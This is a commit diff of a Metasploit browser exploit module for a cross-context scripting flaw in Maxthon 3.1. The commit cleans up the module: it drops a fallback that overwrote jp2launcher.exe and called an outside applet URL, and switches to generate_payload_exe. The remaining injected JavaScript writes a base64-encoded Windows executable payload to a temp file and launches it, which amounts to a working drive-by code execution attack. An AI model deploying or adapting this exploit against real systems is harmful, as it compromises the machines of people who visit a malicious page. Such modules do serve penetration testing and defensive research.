history exploit cleanup

jvazquez-r7 · jvazquez-r7 · commit b0be8dc4dfba · 2012-12-07T19:23:00.000+01:00
diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb
@@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -42,22 +43,10 @@ def initialize(info = {})
 			'DisclosureDate' => 'Nov 26 2012',
 			'DefaultTarget' => 0
 		))
-
-		register_options(
-			[
-				OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
-				OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
-			], self.class
-
-		)
 	end
 
 	def on_request_uri(cli, request)
 
-		jpath = datastore['JPATH']
-		javaurl = datastore['JAVAURL']
-
-		headers = {}
 		html_hdr = %Q^
 			<html>
 			<head>
@@ -79,43 +68,27 @@ def on_request_uri(cli, request)
 				end
 				# We're going to run this through unescape(), so make sure
 				# everything is encoded
-				penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
+				penc = generate_payload_exe
 				penc2 = Rex::Text.encode_base64(penc)
 
-				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon
-				# depending on maxthon version, then file can be launched via Program DOM API
-				# or replacing Java program
-				# here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
-				# this is because the maxthon.program object has been silently removed in latest Maxthon versions...
-				# in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
-				# e.g. wab.exe invoked via mailto://
-				# however, in win7, a prompt will be displayed if browser executes a mail client or an external program
-				# so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
-				# once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
-				# unless previously loaded by the user
+				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon.
+				# Then file can be launched via Program DOM API, because of this only Maxthon 3.1 versions are targeted.
+				# The Program DOM API isn't available on Maxthon 3.2 and upper versions.
 				content =
 						%Q{
+					if(maxthon.program)
+					{
+					alert(1);
 					var fileTemp = new maxthon.io.File.createTempFile("test","exe");
 					var fileObj = maxthon.io.File(fileTemp);
 					maxthon.io.FileWriter(fileTemp);
-
-					if(maxthon.program)
-					{
 					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
 					maxthon.program.Program.launch(fileTemp.name_,"C:");
 					}
-
 					else
 					{
-					fileTemp.name_ = "#{jpath}";
-					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
-
-					a=document.createElement("iframe");
-					a.setAttribute("src","#{javaurl}");
-					document.body.appendChild(a)
-
+					alert(2);
 					}
-
 				}
 
 			when /\?history/
@@ -124,7 +97,6 @@ def on_request_uri(cli, request)
 					location.href = "about:history";
 				}
 				|
-
 				content = %Q|
 				#{html_hdr}
 				<script>
@@ -157,8 +129,7 @@ def on_request_uri(cli, request)
 				return
 		end
 
-		send_response_html(cli, content, headers)
-		handler(cli)
+		send_response_html(cli, content)
 	end
 
 end
